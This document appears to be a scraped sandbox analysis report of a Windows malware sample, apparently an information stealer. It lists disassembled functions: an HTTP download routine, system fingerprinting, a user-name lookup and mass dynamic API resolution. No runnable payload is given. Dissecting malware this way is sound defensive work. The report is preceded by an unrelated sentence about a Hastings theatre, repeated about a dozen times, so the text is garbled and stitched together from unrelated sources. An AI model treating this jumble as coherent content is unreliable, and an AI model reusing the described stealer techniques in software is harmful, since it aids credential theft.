on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 626b2141ffae2a1dfde74e5a9516c14318bdd65d9537a2a66ad264da3bfa45ed
                                  • Instruction ID: 4664333bf217ef15891dc2fe69e4b53ac9a902099038c824aefdb36d431ad1e8
                                  • Opcode Fuzzy Hash: 626b2141ffae2a1dfde74e5a9516c14318bdd65d9537a2a66ad264da3bfa45ed
                                  • Instruction Fuzzy Hash: D3414B647D2604EFC764F7A49C4EF9E7B55FF42748F8052C9E820913C2CB78551449B5
                                  Function 007E62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 7e62d0-7e635b call 7faab0 call 7e4800 call 7faa50 InternetOpenA StrCmpCA 1040 7e635d 1033->1040 1041 7e6364-7e6368 1033->1041 1040->1041 1042 7e636e-7e6392 InternetConnectA 1041->1042 1043 7e6559-7e6575 call 7faab0 call 7fab10 * 2 1041->1043 1045 7e654f-7e6553 InternetCloseHandle 1042->1045 1046 7e6398-7e639c 1042->1046 1062 7e6578-7e657d 1043->1062 1045->1043 1048 7e639e-7e63a8 1046->1048 1049 7e63aa 1046->1049 1051 7e63b4-7e63e2 HttpOpenRequestA 1048->1051 1049->1051 1053 7e63e8-7e63ec 1051->1053 1054 7e6545-7e6549 InternetCloseHandle 1051->1054 1056 7e63ee-7e640f InternetSetOptionA 1053->1056 1057 7e6415-7e6455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 7e647c-7e649b call 7f8ad0 1057->1058 1059 7e6457-7e6477 call 7faa50 call 7fab10 * 2 1057->1059 1067 7e649d-7e64a4 1058->1067 1068 7e6519-7e6539 call 7faa50 call 7fab10 * 2 1058->1068 1059->1062 1071 7e64a6-7e64d0 InternetReadFile 1067->1071 1072 7e6517-7e653f InternetCloseHandle 1067->1072 1068->1062 1076 7e64db 1071->1076 1077 7e64d2-7e64d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 7e64dd-7e6515 call 7facc0 call 7fabb0 call 7fab10 1077->1080 1080->1071
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • InternetOpenA.WININET(00800DFF,00000001,00000000,00000000,00000000), ref: 007E6331
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E6385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0145DB00,00000000,00000000,00400100,00000000), ref: 007E63D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007E640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E6421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007E644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007E64BD
                                  • InternetCloseHandle.WININET(00000000), ref: 007E653F
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6549
                                  • InternetCloseHandle.WININET(00000000), ref: 007E6553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: e918fe78c39bddbf3195f7bb5d45e5fc083b5829d45e1abf3e618b09286dc4f4
                                  • Instruction ID: 543d66cbeba225652aa3f5387fd553d664582dbac02fbc2f7b1fee35df04ac4b
                                  • Opcode Fuzzy Hash: e918fe78c39bddbf3195f7bb5d45e5fc083b5829d45e1abf3e618b09286dc4f4
                                  • Instruction Fuzzy Hash: 34715EB1A00258EBDB14DBE4DC59BEE7775AB48700F108198F60A6B2D1DBB86A84CF51
                                  Function 007F7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 7f7690-7f76da GetWindowsDirectoryA 1357 7f76dc 1356->1357 1358 7f76e3-7f7757 GetVolumeInformationA call 7f8e90 * 3 1356->1358 1357->1358 1365 7f7768-7f776f 1358->1365 1366 7f778c-7f77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 7f7771-7f778a call 7f8e90 1365->1367 1369 7f77a9-7f77b6 call 7faa50 1366->1369 1370 7f77b8-7f77e8 wsprintfA call 7faa50 1366->1370 1367->1365 1377 7f780e-7f781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007F76D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007F770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F779A
                                  • wsprintfA.USER32 ref: 007F77D0
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 15ddcfe297d20330a5973b40efac7538b09e14e4cbc8df313468f8e6960a67ff
                                  • Instruction ID: 4b17d3a49fdde132d2cf514ffcecd794e20b50a608784c6f5bf02948d85f30f3
                                  • Opcode Fuzzy Hash: 15ddcfe297d20330a5973b40efac7538b09e14e4cbc8df313468f8e6960a67ff
                                  • Instruction Fuzzy Hash: 3F4171B1D04248EBDF14DF94DC45BEEBBB8AB48704F104199F609AB381D778AA44CBA5
                                  Function 007F79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007E11B7), ref: 007F7A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F7A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 007F7A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 2b8b965a46c2afbf63f428e44e491141150acce838e0271a8bcde27689d72ccc
                                  • Instruction ID: bd94754add91995f2b02a81db8993100c7a6ec2ec0683c41617e7333fd4403a9
                                  • Opcode Fuzzy Hash: 2b8b965a46c2afbf63f428e44e491141150acce838e0271a8bcde27689d72ccc
                                  • Instruction Fuzzy Hash: 84F04FB1948209EBCB14DFD8DD45BAEBBB8EB49711F10421AF615A2790C7B55900CBA1
                                  Function 007E1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 114165bb2bbe2d2151049ae0fa76525a249445fe725d0466e5b33d534afdac09
                                  • Instruction ID: ed79db09e1c4eb0d25b66af8e27c1a44b6cafe99d23009d86dda7ab8c76a247d
                                  • Opcode Fuzzy Hash: 114165bb2bbe2d2151049ae0fa76525a249445fe725d0466e5b33d534afdac09
                                  • Instruction Fuzzy Hash: 09D05E7490430C9BCB00DFE4A84A6DDBB78BB4C215F000654D90572261EA705442CA75
                                  Function 007F9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 7f9f20-7f9f2a 634 7fa346-7fa3da LoadLibraryA * 8 633->634 635 7f9f30-7fa341 GetProcAddress * 43 633->635 636 7fa3dc-7fa451 GetProcAddress * 5 634->636 637 7fa456-7fa45d 634->637 635->634 636->637 638 7fa526-7fa52d 637->638 639 7fa463-7fa521 GetProcAddress * 8 637->639 640 7fa52f-7fa5a3 GetProcAddress * 5 638->640 641 7fa5a8-7fa5af 638->641 639->638 640->641 642 7fa647-7fa64e 641->642 643 7fa5b5-7fa642 GetProcAddress * 6 641->643 644 7fa72f-7fa736 642->644 645 7fa654-7fa72a GetProcAddress * 9 642->645 643->642 646 7fa738-7fa7ad GetProcAddress * 5 644->646 647 7fa7b2-7fa7b9 644->647 645->644 646->647 648 7fa7ec-7fa7f3 647->648 649 7fa7bb-7fa7e7 GetProcAddress * 2 647->649 650 7fa825-7fa82c 648->650 651 7fa7f5-7fa820 GetProcAddress * 2 648->651 649->648 652 7fa922-7fa929 650->652 653 7fa832-7fa91d GetProcAddress * 10 650->653 651->650 654 7fa98d-7fa994 652->654 655 7fa92b-7fa988 GetProcAddress * 4 652->655 653->652 656 7fa9ae-7fa9b5 654->656 657 7fa996-7fa9a9 GetProcAddress 654->657 655->654 658 7faa18-7faa19 656->658 659 7fa9b7-7faa13 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01446400), ref: 007F9F3D
                                  • GetProcAddress.KERNEL32(75900000,01446580), ref: 007F9F55
                                  • GetProcAddress.KERNEL32(75900000,01458FB8), ref: 007F9F6E
                                  • GetProcAddress.KERNEL32(75900000,01458F10), ref: 007F9F86
                                  • GetProcAddress.KERNEL32(75900000,0145CA60), ref: 007F9F9E
                                  • GetProcAddress.KERNEL32(75900000,0145C910), ref: 007F9FB7
                                  • GetProcAddress.KERNEL32(75900000,0144AFF0), ref: 007F9FCF
                                  • GetProcAddress.KERNEL32(75900000,0145C9B8), ref: 007F9FE7
                                  • GetProcAddress.KERNEL32(75900000,0145C850), ref: 007FA000
                                  • GetProcAddress.KERNEL32(75900000,0145C880), ref: 007FA018
                                  • GetProcAddress.KERNEL32(75900000,0145C940), ref: 007FA030
                                  • GetProcAddress.KERNEL32(75900000,014465A0), ref: 007FA049
                                  • GetProcAddress.KERNEL32(75900000,01446420), ref: 007FA061
                                  • GetProcAddress.KERNEL32(75900000,014465C0), ref: 007FA079
                                  • GetProcAddress.KERNEL32(75900000,014465E0), ref: 007FA092
                                  • GetProcAddress.KERNEL32(75900000,0145CA48), ref: 007FA0AA
                                  • GetProcAddress.KERNEL32(75900000,0145C958), ref: 007FA0C2
                                  • GetProcAddress.KERNEL32(75900000,0144B068), ref: 007FA0DB
                                  • GetProcAddress.KERNEL32(75900000,01446440), ref: 007FA0F3
                                  • GetProcAddress.KERNEL32(75900000,0145C988), ref: 007FA10B
                                  • GetProcAddress.KERNEL32(75900000,0145C970), ref: 007FA124
                                  • GetProcAddress.KERNEL32(75900000,0145C9D0), ref: 007FA13C
                                  • GetProcAddress.KERNEL32(75900000,0145C898), ref: 007FA154
                                  • GetProcAddress.KERNEL32(75900000,014462C0), ref: 007FA16D
                                  • GetProcAddress.KERNEL32(75900000,0145C9A0), ref: 007FA185
                                  • GetProcAddress.KERNEL32(75900000,0145C8E0), ref: 007FA19D
                                  • GetProcAddress.KERNEL32(75900000,0145CA00), ref: 007FA1B6
                                  • GetProcAddress.KERNEL32(75900000,0145C9E8), ref: 007FA1CE
                                  • GetProcAddress.KERNEL32(75900000,0145C868), ref: 007FA1E6
                                  • GetProcAddress.KERNEL32(75900000,0145CAC0), ref: 007FA1FF
                                  • GetProcAddress.KERNEL32(75900000,0145C8F8), ref: 007FA217
                                  • GetProcAddress.KERNEL32(75900000,0145C820), ref: 007FA22F
                                  • GetProcAddress.KERNEL32(75900000,0145CA18), ref: 007FA248
                                  • GetProcAddress.KERNEL32(75900000,014599A8), ref: 007FA260
                                  • GetProcAddress.KERNEL32(75900000,0145CA30), ref: 007FA278
                                  • GetProcAddress.KERNEL32(75900000,0145CAD8), ref: 007FA291
                                  • GetProcAddress.KERNEL32(75900000,01446620), ref: 007FA2A9
                                  • GetProcAddress.KERNEL32(75900000,0145C838), ref: 007FA2C1
                                  • GetProcAddress.KERNEL32(75900000,01446660), ref: 007FA2DA
                                  • GetProcAddress.KERNEL32(75900000,0145CA78), ref: 007FA2F2
                                  • GetProcAddress.KERNEL32(75900000,0145CA90), ref: 007FA30A
                                  • GetProcAddress.KERNEL32(75900000,01446280), ref: 007FA323
                                  • GetProcAddress.KERNEL32(75900000,014462A0), ref: 007FA33B
                                  • LoadLibraryA.KERNEL32(0145CAA8,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA34D
                                  • LoadLibraryA.KERNEL32(0145C7F0,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA35E
                                  • LoadLibraryA.KERNEL32(0145C808,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA370
                                  • LoadLibraryA.KERNEL32(0145C8B0,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA382
                                  • LoadLibraryA.KERNEL32(0145C8C8,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA393
                                  • LoadLibraryA.KERNEL32(0145C928,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA3A5
                                  • LoadLibraryA.KERNEL32(0145CB20,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA3B7
                                  • LoadLibraryA.KERNEL32(0145CCD0,?,007F5EF3,00800AEB,?,?,?,?,?,?,?,?,?,?,00800AEA,00800AE7), ref: 007FA3C8
                                  • GetProcAddress.KERNEL32(75FD0000,014466E0), ref: 007FA3EA
                                  • GetProcAddress.KERNEL32(75FD0000,0145CB38), ref: 007FA402
                                  • GetProcAddress.KERNEL32(75FD0000,01458820), ref: 007FA41A
                                  • GetProcAddress.KERNEL32(75FD0000,0145CD48), ref: 007FA433
                                  • GetProcAddress.KERNEL32(75FD0000,014469A0), ref: 007FA44B
                                  • GetProcAddress.KERNEL32(6FD30000,0144AF50), ref: 007FA470
                                  • GetProcAddress.KERNEL32(6FD30000,01446740), ref: 007FA489
                                  • GetProcAddress.KERNEL32(6FD30000,0144B2C0), ref: 007FA4A1
                                  • GetProcAddress.KERNEL32(6FD30000,0145CB80), ref: 007FA4B9
                                  • GetProcAddress.KERNEL32(6FD30000,0145CD78), ref: 007FA4D2
                                  • GetProcAddress.KERNEL32(6FD30000,014466A0), ref: 007FA4EA
                                  • GetProcAddress.KERNEL32(6FD30000,01446780), ref: 007FA502
                                  • GetProcAddress.KERNEL32(6FD30000,0145CDA8), ref: 007FA51B
                                  • GetProcAddress.KERNEL32(763B0000,01446860), ref: 007FA53C
                                  • GetProcAddress.KERNEL32(763B0000,01446960), ref: 007FA554
                                  • GetProcAddress.KERNEL32(763B0000,0145CB50), ref: 007FA56D
                                  • GetProcAddress.KERNEL32(763B0000,0145CC88), ref: 007FA585
                                  • GetProcAddress.KERNEL32(763B0000,01446840), ref: 007FA59D
                                  • GetProcAddress.KERNEL32(750F0000,0144B090), ref: 007FA5C3
                                  • GetProcAddress.KERNEL32(750F0000,0144B1A8), ref: 007FA5DB
                                  • GetProcAddress.KERNEL32(750F0000,0145CB68), ref: 007FA5F3
                                  • GetProcAddress.KERNEL32(750F0000,01446760), ref: 007FA60C
                                  • GetProcAddress.KERNEL32(750F0000,01446980), ref: 007FA624
                                  • GetProcAddress.KERNEL32(750F0000,0144B310), ref: 007FA63C
                                  • GetProcAddress.KERNEL32(75A50000,0145CC10), ref: 007FA662
                                  • GetProcAddress.KERNEL32(75A50000,014467A0), ref: 007FA67A
                                  • GetProcAddress.KERNEL32(75A50000,01458920), ref: 007FA692
                                  • GetProcAddress.KERNEL32(75A50000,0145CB98), ref: 007FA6AB
                                  • GetProcAddress.KERNEL32(75A50000,0145CBB0), ref: 007FA6C3
                                  • GetProcAddress.KERNEL32(75A50000,01446820), ref: 007FA6DB
                                  • GetProcAddress.KERNEL32(75A50000,014468E0), ref: 007FA6F4
                                  • GetProcAddress.KERNEL32(75A50000,0145CBC8), ref: 007FA70C
                                  • GetProcAddress.KERNEL32(75A50000,0145CC28), ref: 007FA724
                                  • GetProcAddress.KERNEL32(75070000,014467E0), ref: 007FA746
                                  • GetProcAddress.KERNEL32(75070000,0145CCE8), ref: 007FA75E
                                  • GetProcAddress.KERNEL32(75070000,0145CBF8), ref: 007FA776
                                  • GetProcAddress.KERNEL32(75070000,0145CAF0), ref: 007FA78F
                                  • GetProcAddress.KERNEL32(75070000,0145CC40), ref: 007FA7A7
                                  • GetProcAddress.KERNEL32(74E50000,01446A00), ref: 007FA7C8
                                  • GetProcAddress.KERNEL32(74E50000,014469C0), ref: 007FA7E1
                                  • GetProcAddress.KERNEL32(75320000,01446940), ref: 007FA802
                                  • GetProcAddress.KERNEL32(75320000,0145CBE0), ref: 007FA81A
                                  • GetProcAddress.KERNEL32(6F060000,014467C0), ref: 007FA840
                                  • GetProcAddress.KERNEL32(6F060000,014466C0), ref: 007FA858
                                  • GetProcAddress.KERNEL32(6F060000,014469E0), ref: 007FA870
                                  • GetProcAddress.KERNEL32(6F060000,0145CD90), ref: 007FA889
                                  • GetProcAddress.KERNEL32(6F060000,01446800), ref: 007FA8A1
                                  • GetProcAddress.KERNEL32(6F060000,01446A20), ref: 007FA8B9
                                  • GetProcAddress.KERNEL32(6F060000,01446880), ref: 007FA8D2
                                  • GetProcAddress.KERNEL32(6F060000,014468A0), ref: 007FA8EA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 007FA901
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 007FA917
                                  • GetProcAddress.KERNEL32(74E00000,0145CC58), ref: 007FA939
                                  • GetProcAddress.KERNEL32(74E00000,01458950), ref: 007FA951
                                  • GetProcAddress.KERNEL32(74E00000,0145CD60), ref: 007FA969
                                  • GetProcAddress.KERNEL32(74E00000,0145CC70), ref: 007FA982
                                  • GetProcAddress.KERNEL32(74DF0000,014468C0), ref: 007FA9A3
                                  • GetProcAddress.KERNEL32(6F9A0000,0145CCA0), ref: 007FA9C4
                                  • GetProcAddress.KERNEL32(6F9A0000,01446700), ref: 007FA9DD
                                  • GetProcAddress.KERNEL32(6F9A0000,0145CCB8), ref: 007FA9F5
                                  • GetProcAddress.KERNEL32(6F9A0000,0145CD00), ref: 007FAA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
